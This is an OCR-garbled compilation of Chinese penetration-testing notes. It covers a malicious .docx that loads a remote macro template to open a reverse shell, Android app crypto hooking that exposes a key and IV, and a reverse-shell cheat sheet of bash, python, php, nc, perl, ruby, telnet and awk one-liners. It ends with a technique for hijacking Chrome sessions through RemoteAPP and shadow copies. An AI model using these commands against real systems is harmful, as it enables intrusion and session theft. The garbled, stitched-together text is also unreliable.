点 击 启用 ，vps 监 听 上 就 能 看 到 反弹 的 shel11。 (测试 环境 下 ， 杀 软 已 关 ) 

<span lang="EN-US">! [HA .png](./img/20191218102700691517538 
这 个 文档 需要 保存 ! ! ! 保存 的 时 候 自 定义 名 字 ， 保 存 格式 为 ,docx: 


(4) 创 建 使 用 云端 宏 模 板 的 .docx 文 档 


将 保存 的 Doc1 .docx 文档 重 命名 为 Doc1 .zip: 


打开 压缩 包 ， 选 取 word- - ->\_rels 目 录 后 ， 对 文件 Settings .xml .rels 右 键 使 用 记事 本 打开 : «sp 
! [AK . png] (./img/20: 
! [R> . png] (./img/20191218102920543321780. png) 


! (BR .png]( ./img/2019121810295392441411. png) 
保存 后 ， 再 将 文档 名 改 回 Doc1, docx: «span lang="EN-US"></span> 


人 信用 全 


文档 加 载 宏 模板 ， 此 时 宏 模 板 放 的 网 站 域名 如 果 很 奇 范 ， 很 容易 露馅 \~\~\~ 
! [BF .png](./img/201912: 
进入 文档 后 ， 发 现 杀 软 不 报 毒 与 拦截 ， 直 接点 击 启用 内 容 ， 即 可 弹 she11 (BD ALCIBURIR (GE RSG 
! [FF . png] (./img/20191218103116323910111.png) 
! [EA . png] ( ./img/20191218103252144555911.png) 
参考 链接 : <span lang="EN-US"></span> 


[https://mp.weixin.qq.com/s/PObEa24BIckyO9qzhV-rFw](https://mp.weixin.qq.con 


[https://www.anquanke. com/post/id/87328](https://www.anquanke.com/post/id/87 


b 
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APP 密 码 算法 通用 分 析 方 法 
RAA: 杨 廷 峰 (TFyang@dbappsecuritycom.cn) 


。 在 APP 测 试 过 程 经 常会 遇 到 报 文 被 加 密 的 情况 ， 之 前 在 大 部 分 的 情况 ， 可 能 需要 进行 脱 壳 ， 逐 
行 分 析 代 码 ， 获 取 算 法 ， 编 写 解密 的 程序 CLR) 一 一 适用 于 任何 情况 下 的 万 能 解法 。 


。 因为 过 程 实在 是 有 些 繁琐， 文章 里 是 我 尝试 分 析 app 加 密 算法 的 一 些 取 巧 的 方式 ， 可 以 进行 党 
试 。 


密码 算法 介绍 
密码 算法 强度 依赖 


。 密码 算法 源头 可 以 追溯 到 古典 算法 。 一 般 而 言 古典 算法 依赖 于 两 种 方式 一 一 移 位 和 代 换 混淆 明 
文 ， 从 而 无 法 破译 。 但 是 对 于 大 多 数 的 古典 密码 而 言 ， 其 加 密 强度 依赖 于 算法 保密 性 以 及 密 钥 
保密 。 


。 但 是 对 于 现代 密码 学 而 言 ， 加 密 强 度 完全 依赖 于 密 钥 (算法 在 某 种 程度 上 一 定 会 被 获取 ， 而 设 
计 好 的 算法 存在 一 定 的 难度 ) 。 


。 对 于 我 想 要 做 的 app 算 法 分 析 而 言 ， 我 在 大 部 分 的 情况 是 在 寻找 密 钥 。 找 到 密 钥 ， 套 用 几 个 现 
代 密 码 学 算法 ， 完 成 分 析 。 


涉及 概念 


。 我 在 实际 的 接触 过 程 中 ， 大 部 分 的 人 其 实 对 于 密码 涉及 到 的 相关 概念 其 实 认识 的 很 模糊 ， 经 常 
统称 为 密码 算法 ， 这 里 进行 简单 的 介绍 


o Hash 算 法 〈 哈 希 算 法 ) 


» 常见 的 包括 md5、shaL、sm3。 这 类 算法 主要 对 信息 进行 摘要 ， 从 摘要 两 个 字 应 该 能 
够 意识 到 进行 这 种 算法 获取 的 数据 无 法 还 原 成 原来 的 信息 ， 因 为 只 保存 了 部 分 数据 。 


那么 我 们 常 说 的 md5 解 密 、sha1 解 密 ， 又 是 什么 呢 ? 其 实 这 是 在 说 明 一 类 情况 Hash 
碰撞 ， 一 一 A 通 过 hash 函 数 生 成 了 C，B 也 通过 hash 函 数 生成 了 C， 这 样 一 种 情况 。 由 
于 hash 字 符 串 的 空间 几乎 无 限 大 ， 那 么 我 们 可 以 理解 A 与 B 是 相同 的 内 容 ， 所 以 说 C 通 
过 md5 解 密生 成 了 B 。 我 们 通过 提交 B 来 代替 A 一 一 对 于 接受 对 象 而 言 的 输出 都 是 C 所 
以 是 一 致 的 〈 当 然 实际 上 A，B 也 可 以 不 同 ， 具 体 可 以 了 解 下 王小云 破解 md5) 
o 编码 算法 
« 这 一 类 就 比较 容易 和 密码 算法 混 浠 了， 这 类 算法 主要 是 为 了 解决 传输 或 者 转换 过 程 中 
可 能 出 现 的 错乱 。 一 般 而 言 没有 密 钥 这 样 的 说 法 ， 就 是 规定 了 一 套 编 码 和 解码 的 算 
法 ， 常 见 算法 有 base64、 十 六 进 制 字符 叮 
o 密码 算法 
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- 其 实 到 现在 为 止 ， 密 码 算法 一 般 指 的 就 是 现代 密码 学 一 一 几 类 对 称 密码 和 非 对 称 密 
码 。 


= 两 者 的 区 别 就 在 于 ， 加 密 和 解密 的 密 钥 是 否 能 够 互相 还 原 。 
o 分 组 算法 (block cipher mode) 
。 密码 算法 都 是 针对 具体 的 块 进行 加 密 ， 多 个 块 之 间 怎 么 连接 ， 就 是 分 组 算法 
« 例如 ECB、CBC 等 ， 有 具体 可 以 去 wiki 搜索 block cipher mode 
o 填充 模式 
= 长 度 不 够 的 块 ， 怎 么 填充 。 


分 析 原 理 


。 为 什么 我 们 在 理论 上 一 定 能 够 突破 密码 算法 ? 我 作为 客户 端的 角色 进行 操作 ， 理 论 上 我 能 控制 
客户 端 所 有 的 内 容 。 数 据 在 客户 端 完 成 加 密 、 发 送 。 只 要 客户 端 能 够 提供 加 密 的 能 力 ， 我 理论 
上 也 能 。 

。 既然 我 们 不 想 要 直接 分 析 应 用 app 的 源 代码 ， 那 么 我 们 能 够 工程 化 控制 的 就 是 执行 环境 ， 就 说 
下 图 架构 中 除了 application 的 所 有 内 容 





APPLICATIONS 





LIBRARIES ANDROID RUNTIME 


Driver 





qo P SUN HM 4 
Management 


。 当然 这 里 比较 好 的 消息 是 ， 大 部 分 应 用 调用 了 java 扩 展 包 中 的 加 密 算 法 。 那 我 们 是 不 是 能 够 通 


过 hook 相 关 的 函数 来 获取 密码 算法 的 调用 情况 呢 ? 


。 PS: 大 佬 们 都 已 经 整 完了 ， 上 工具 ， 丢 掉 脑 袋 ， 当 个 tool man. 


工具 准备 


Xposed 


e CryptoFucker ,可 以 稍微 改 一 改 代码 更 加 好 用 。 





分 析 过 程 


。 PS: 我 想 这 个 正文 可 能 是 最 短 的 正文 了 一 一 工具 流水 线 。 


inspeckage 


1. 使 用 inspeckage 加 载 app， 查 看 调用 情况 以 及 一 些 其 他 属性 





UID: 10081 
GiDs: 3003. 





Package Information St 





Exported Activities 


‘tivity. NewSp 
7 activity. CSIINFCActivity 
„xapi WXEntryActivity 


Non Exported Activities 


Lactivity. SplasnSereenAciivity 
*e.control.ActionActivity 
“Ss. MainActivity 
“avoriteListActivity 
ankListActivity 
"oblie.zxing.CaptureActivity 
»Artivity.CaptureAGtivity 
Ji.activity. ORCodeBgActivity 


1. 点 到 crypto 模 块 下 ， 可 以 看 到 使 





i Debuggabie: faise 
-1028-1015 


Aliow Backup: faise 


> Start Actwity 


用 加 密 算法 的 情况 


e a wenange tn te 


QnA 


Requested Permissions 


3AMERA 
“o uermission. FLASHLIGHT 
ission. ACCESS, DOWNLOAD. MANAGER 
ssion. VIBRATE 
anission. INTERNET 
oid permission. READ_PHONE_STATE 
mission. READ_LOGS 
dssion.CALL PHONE 
androld.permission. ACCESS FINE LOCATION 
android.permission ACCESS COARSE LOCATION 
android permission. GET TASKS 
android permission. MOUNT, UNMOUNT_FILESYSTEMS 
android.permission ACCESS_WIFI_STATE 
android. permission. ACCESS_NETWORK_STATE 
android.permission.READ_CONTACTS 
android nermigsinn READ FXTFRNAI STORAGF 





anioi 


VOblvsw Y 





+ 密 钥 是 : B9DC7BFD361F8348 IV: nmeug.f9/Om+L823 算法 是 Java 默认 的 AES 


> 


。 从 列表 里 也 可 以 看 到 ， 密 码 没 有 打印 调用 栈 ， 有 时 候 可 能 不 清楚 哪个 数据 包 是 正确 的 (SDK、 
本 地 数据 等 等 都 可 能 调用 密码 算法 ) 


CryptoFucker 


。 通过 hook， 输 出 到 ydsec 文 件 夹 下 ， 把 应 用 包 名 作为 文件 名 
。 运行 后 ， 可 以 查看 相关 的 信息 ， 定 位 调用 栈 (后 续 可 以 修改 相关 代码 ) 


RSA/ECB/PRCSlPadding Data: 
` .newmbank,util.b.i->b  RSACerPlus.java(112) 


c newmbank.util.b.i-> RSACerPlus.java(102) 
ox00000000 34 6B 34 77 72 53 79 62 4F 33 57 7A 43 37 ED 66 4k4wrSybO3WzC7mf 
Oxo 0 00 00 00 00 GO 00 OC 00 00 00 OO OD 00 00 09 00 





MDS update d 
com.loc.r-»d 






1Padding result: 
bank.util.b.i->b  RSACerPlus 





.newmbank.util.bp-»a  SendClientMessageUtil.java(133) 


33 57 7A 43 37 6D 66 4k4wrSybO3WzC7mf 
00 00 00 00 00 00 00 


^*clinit»  Encrypt.java(52) 





»«init» LastLocationManager.java(44) 





。 其 他 类 似 工具 都 自己 去 尝试 吧 ， 上 述 工具 都 是 github 上 的 ， 可 以 根据 自己 的 需要 去 修订 一 个 合 
适 的 版 本 。 


常见 的 算法 组 合 
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。 AES/DES 


o 仅仅 采用 AES， 密 钥 可 能 通过 简单 的 编码 或 者 置换 存放 在 数据 包 中 。 
o 硬 编码 在 应 用 当中 ， 这 类 情况 用 文中 的 方式 较 容易 解决 。 
* RSA+ AES 


o 通过 RSA 加 密 AES 密 铀 ， 与 客户 端 进行 协商 ， 或 者 保存 在 数据 包 中 。 
。 添加 MAC 


o MAC (消息 认证 码 ) ， 数 据 包 的 hash 值 作为 数据 包 一 部 分 。 一 般 hash 算 法 采用 md5 或 者 
sha-1 


加 解密 


。 知道 相关 密 钥 信息 和 IV 等 信息 ， 就 按照 提前 准备 好 的 密码 工具 进行 加 解密 即 可 


加 解密 工具 二 口 x 
AMA: | AYA: iv: 
数据 预 处 理 : UserDefine wo woe: UserDefine v EE:  UserDefine v 
HRY: — UserDefine wm， 填充 算法 : — pkcs7padding v Xf UTF-8 v 
明文 : WE 解密 | 
EX 


wyi: Enable 


test?” ^wx9fdb8ble7 ce3co8f 
test2”: "12 


testData1 ScipherDatas 





Create By Alkd 
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Linux 下 反弹 shell 命 令 


1.bash/z 3Éshell 


接收 端 : nc -lvvp 端口 
发 送 端 bash -i >& /dev/tcp/ 接 收 端 ip/ 接 收 端 端 口 9>&1 


root @kali: ~ 


搜索 (Sj 终端 (T) 帮助 (H) 


bash -i >& /dev/tcp/192.168.163.133/6666 90>&1 





ntu - VMware Workstation 一 


tation v - : : cf 


intu 
可] 终端 + 星期 一 21 : 44 
root @kali: ~ 


文件 (F) 编辑 (E) 查看 (V) 搜索 (S) 终端 (TD) 帮助 (H) 


ryan@ryan-ubuntu:~$ nc -lvvp 6666 
Listening on [0.0.0.0] (family 9, port 6666) 


Connection from 192.168.163.129 35164 received! 
t~# whoami 


whoami 
root 





2.python 反 弹 shell 


接收 端 : nc -lvvp 端口 
发 送 端 : python -c 'import socket, subprocess, 0s;s=socket.socket(socket.AF\_INET, So 


= 


root ali: ~ @ © 0 | 


| 文件 (F) 编辑 (E) SEV 搜索 (S) 终端 T) 帮助 (H) 

:~# python -c ‘import socket,subprocess,0s;s-socket.socket(socket.AF IN 
ET, socket.SOCK STREAM) ;5.connect(("192.168.163.133" ,6666));05.dup2(s.fileno(),9) 
; 05.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call({"/bin/bash", “ 
LN) ES 








ntu - VMware Workstation 


tation ¥ E B 


星期 一 21 : 39 
root@kali: ~ 


文件 (F) 编辑 (E) 查看 (V) 搜索 (S) 终端 (T) 帮助 (H) 


ryan@ryan-ubuntu:~$ nc -lvvp 6666 

Listening on [6.0.0.0] (family O, port 6666) 

Connection from 192.168.163.129 35169 received! 
:~# whoami 

whoami 

root 


TM | 





3.phphz5#shell 


接收 端 : nc -1Lvvp 端口 
发 送 端 : php -r '$sock-fsockopen( "接收 端 ip" ,接收 端 端口 ) ;exec("/bin/bash -i <&3 >&3 2> 


b 
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root @kali: ~ 








搜索 (S$) 终端 T) 帮助 (H) 











&3 >&3 2»563");' 


itu - VMware Workstation = 


ation ¥ - I | v 


星期 一 21 : 42 
root@kali: ~ 


文件 (F) 编辑 (E) 查看 (V) 搜索 (S) 终端 (T) 帮助 (H) 

ryan@ryan-ubuntu:~$ nc -lvvp 6666 

Listening on [9.0.0.0] (family ©, port 6666) 

Connection from 192.168.163.129 35162 received! 
:~# whoami 

whoami 

root 


T | 





4.nc 反 弹 shell 


接收 端 : nc -lvvp 端口 
发 送 端 : nc 接收 端 ip 接收 端 端口 -e /bin/bash 2>&1>/dev/null & 
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root @kali: ~ 
文件 IF) 编辑 (E} BBV) MRS) 终端 T) 帮助 ({H) 
:~# nc 192.168.163.133 6666 -e /bin/bash 2>&1>/dev/null & 


[1 4234 


D4 || 





























ntu - VMware Workstation g 


tation * E v 


intu 
E 终端 ~ 星期 一 21 ; 45 
ryan@ryan-ubuntu: ~ 


文件 (F) 编辑 (日 查看 (V) 搜索 (S) 终端 (D 帮助 (H) 


cyan@ryan-ubuntu:~-$ nc -lvvp 6666 
Listening on [0.0.0.0] (family 6，port 6666) 
Connection from 192.168.163.129 35170 received! 


whoami 
root 





5.perl 反 弹 shell 


接收 端 : nc -lvvp 端口 
Aim: perl -e 'use Socket ;$i=" 接 收 端 ip";$p= 接 收 端 端口 ;socket(S,PF\_INET, SOCK\_STRE 





d 
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root @kali: ~ 
文件 {F) 编辑 (E) 查看 (V) 搜索 (S) 终端 IT) 帮助 (H) 
:~# perl -e ‘use Socket; $i="192.168. 163.133"; $p=6666;socket(S,PF_INET, SE 


OCK STREAM, getprotobyname("tcp"));if(connect(S,sockaddr in($p,inet aton($i))))( 
pen(STDIN, "5&S") ;open(STDOUT, ">&S") ; open(STDERR, "»&S") ;exec("/bin/bash -i"););' 





atu - VMware Workstation = 


tation ¥ E 1 | » 


星期 一 21 : 52 
root@kalk: ~ 


文件 (F) 编辑 (E) 查看 (V) RRS) 终端 (T) 帮助 (H) 

ryan@ryan-ubuntu:~$ nc -lvvp 6666 

Listening on [0.0.0.0] (family ©, port 6666) 

Connection from 192.168.163.129 35172 received! 
:~# whoami 

whoami 

root 


ed | 





6.ruby 反 弹 shell 


接收 端 : nc -lvvp 端口 
发 送 端 : ruby \-r socket \-e 'exit if fork;c=TCPSocketN,newN(" 接 收 端 ip"\, "接收 端 端口 " 


root@kali: ~ 


文件 (F) 编辑 (E) BBV) 搜索 (S$) 终端 (T) ANH) 
:~# ruby -r socket -e ‘exit if fork;c=TCPSocket.new("192.168.163.133",” 
6666") ;while(cmd=c.gets);10.popen(cmd,"r"){|io|c.print io.read}end' 


:~# ff 





tation v v 


intu 


四 终端 星期 一 21 : 53 
ryan@ryan-ubuntu: ~ 


文件 (F) 编辑 (E) 查看 (V) 搜索 (S) 终端 (T) 帮助 (H) 
ryan@ryan-ubuntu:~$ nc -lvvp 6666 

Listening on [0.0.0.0] (family 0, port 6666) 
Connection from 192.168.163.129 35174 received! 


whoami 
root 





7 telnethz5%shell 


接收 端 : nc -lvvp 端口 
发 送 端 : mknod backpipe p && telnet 接收 端 ip 接收 端 端口 O<backpipe \| /bin/bash 1\>ba 


> 


root @kali: ~ 


查看 (V) RS) Baw) 帮助 (H) 
ot :~# mknod backpipe p && telnet 192.168.163.133 6666 O<backpipe | /bin/b 
ash 1>backpipe 
/bin/bash:{71: Trying: 未 找到 命令 
/bin/bash: 行 2: Connected :未 找到 命令 
/bin/bash:í13: Escape: 未 找到 命令 





tation v Y | wv 


intu 


] ©) 终端 ~ 星期 一 21 : 
ryan@ryan-ubuntu: ~ 
文件 (F) 编辑 (E) 查看 (Vv) RRSO 终端 (TD) 帮助 (H) 
ryan@ryan-ubuntu:~$ nc -lvvp 6666 


Listening on [0.0.0.0] (family 9, port 6666) 
Connection from 192.168.163.129 35176 received! 


whoami 
root 





8.awk/x séshell 





接收 端 : nc -lvvp 端口 
发 送 端 : awk 'BEGIN\{s="/inet/tcp/9/ 接 收 端 ip/ 接 收 端 端口 ";while\(1\)\{do\{s\|&getline 














b 


co 
~ 
v 


root@kali: ~ 


文件 {F} 编辑 (E) 查看 (VY) 搜索 ($) 终端 T) 帮助 (H) 
:~# awk 'BEGIN{s="/inet/tcp/0/192.168.163.133/6666";while(1){do{s|&getl 
ine c;if(c){while((c|&getline)>0)print $0[&s;close(c) }}while(c!="exit");close(s) 


X 





tation v Y 


intu 
四 Big + 星期 一 22 ; 03 
ryan@ryan-ubuntu: ~ 
文件 (F) 编辑 (E) 查看 (V) 搜索 (S) 终端 (T) 帮助 (H) 


ryan@ryan-ubuntu:~$ nc -lvvp 6666 
Listening on [0.0.0.0] (family ©, port 6666) 


Connection from 192.168.163.129 41479 received! 
whoamt 
root 











Browser Pivot for Chrome 


标题 只 是 个 叫 头 。 文 章 介绍 如 何 窃取 当前 chrome 的 session, 以 获取 当前 用 户 正在 浏览 的 web 的 权 
限 。 根 据 复 现 。 


0x00 前 言 


在 CS 上 有 Browser Pivot 功 能 ,用 于 针对 IE 进 行 浏览 器 中 间 人 攻击 ， 动 持 受 感染 用 户 的 已 验证 Web 会 
话 。Cobalt Strike 使 用 注入 到 32 位 和 64 位 Internet Explorer 中 的 代理 服务 器 来 实现 浏览 器 透视 。 当 浏 
览 此 代理 服务 器 时 ， 将 继承 Cookie， 经 过 身份 验证 的 HTTP 会 话 和 客户 端 SSL 证 书 。 对 于 chrome， 
作者 提供 使 用 RemoteAPP+ 命 令 行 指定 配置 文件 启动 chrome 的 方式 来 达到 类 似 效果 。 


0x01 RemoteAPP 


RemoteAPP 是 一 种 虚拟 应 用 程序 解决 方案 ， 无 论 用 户 使 用 什么 操作 系统 ， 都 可 以 使 用 户 运 行 基于 
Windows 的 应 用 程序 。 它 允许 用 户 从 出 现在 其 计算 机 上 的 服务 器 启动 虚拟 应 用 程序 ， 就 像 虚拟 服务 
器 是 本 地 安装 的 一 样 ， 但 实际 上 是 在 远程 服务 器 上 运行 的 。 简 而 言 之 ，RemoteAPP 是 RDP 服 务 的 
一 种 ， 区 别 于 远程 桌面 ， 它 只 在 客户 端 打开 服务 端 上 指定 的 应 用 ， 如 CMD。 默 认 支 持 RemoteAPP 
服务 端的 系统 要 求 最 低 win7 Enterprise 和 ULtimate， 需 要 开启 多 用 户 登 录 支 持 ， 我 使 用 ap 来 
实现 。 使 用 RemoteAPP 可 绕 过 chrome 的 校 验 。 


0x02 命令 行 启动 Chrome 

在 终端 里 ， 可 以 用 chrome.exe [options] 的 形式 注定 会 及 来 开启 chrome。 通 过 使 用 chrome 的 远程 调 
试 模式 ， 还 可 以 

0x03 利用 步骤 


。 使 用 Rdpwrap 开 启 多 用 户 同时 登录 
rdpwinst -i is 


。 修改 注册 表 
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Windows Registry Editor Version 5.00 AB 


[HKEY LOCAL MACHINENSOFTWAREMMicrosoftNWindows NTNCurrentVersionNTerminal Se 


[HKEY LOCAL MACHINENSOFTWARENMicrosoftNWindows NT\CurrentVersion\Terminal Se 
“LicenseServers"=hex(7):00,00 

"CertificateIssuedBy"="" 

"LicensingType"=dword : 90000005 

"fHasCertificate"=dword : 00000000 

"CertificateExpiresOn"z"" 

"CentralLicensing"=dword : 00000000 

"fDisabledAllowList"=dword: 00000001 

"CertificateIssuedTo"="" 

"CustomROPSettings"-"authentication level:i:2" 





[HKEY LOCAL MACHINENSOFTWAREMMicrosoftNWindows NT\CurrentVersion\Terminal Se 
[HKEY LOCAL MACHINENSOFTWAREMMicrosoftNwWindows NT\CurrentVersion\Terminal Se 


"Name"="Notepad" 
"Path"="C:\\\\windows\\\\system32\\\\notepad. exe" 


。 配置 rdp 文 件 
在 mstsc 上 另存 为 rdp 文 件 
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常规 ”显示 “本 地 资源 RR HAS OBR 


登录 设置 
7 辆 入 远程 计算 机 的 名 种 。 
计算 机 ete T {i computer. fabrikam com v 
用 户 名 


计 菇 机 名 种 字段 为 宇 。 博 输入 完整 的 远程 计算 机 名 称 。 





连接 设置 N 
gsm eS ROP SIBI 
保存 G) BAW)... HR)... 
km (0) SOW) 都 助 由 





编辑 得 到 的 rdp 文 件 ， 在 末尾 添加 配置 


disabl eremot eappc capscheck :i:1 


remoteapplicationmode:i:1 4 
alternate shell:s:rdpinit.exe "4 
shell working directory:s 
remoteapplicationprogram:s: Explorer 
remoteapplicationcmdline:s: 


注意 箭头 处 要 和 上 面 注册 表 项 里 的 "Name" 项 一 致 
。 卷 影 复制 Chrome 配 置 文件 


a 0 0| HIS A TRESS RT ASE, 需要 使 用 卷 影 来 复制 。 我 使 用 
owe 来 实现 。 要 复制 的 配置 文件 

e "eu ——— 0 0 nibo Data， 我 把 复制 的 文件 放 在 

C:\users\public\Documents 目 录 下 
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。 使 用 RemoteAPP 打 开 chrome 


在 Explorer 进 到 chrome.exe 所 在 目录 ， 打 开 cmd， 命 令 chrome.exe --user-data- 


dir="C:\\users\\public\documents\User Data" --disable-gpu 我 在 虚拟 机 下 需要 用 -- 
disable-gpu 禁 用 chrome 硬 件 加 速 才 能 正常 启动 ， 不 然 chrome 会 黑 框 。 物 理 机 上 没 测试 。 











cated DAM RM Bu TOSSA QApp RR 





\cate4dcafe MppDat a\Local\Goog le \Chrome Applicat ion>chrone exe --user-dat 
+= "Cz Wsers Public Documents Miser Data" --disable-gpu 


2: Users \cate4cafe AppData\Local Goog le Chrome Application?» m 





0x04 后 记 


在 默认 不 支持 RemoteAPP 的 系统 上 ， 或 许可 以 参照 


nm 


修改 来 使 系统 支持 RemoteAPP。 由 于 我 只 是 个 脚本 菜 鸡 ， 没 能 成 功 实 现 。 
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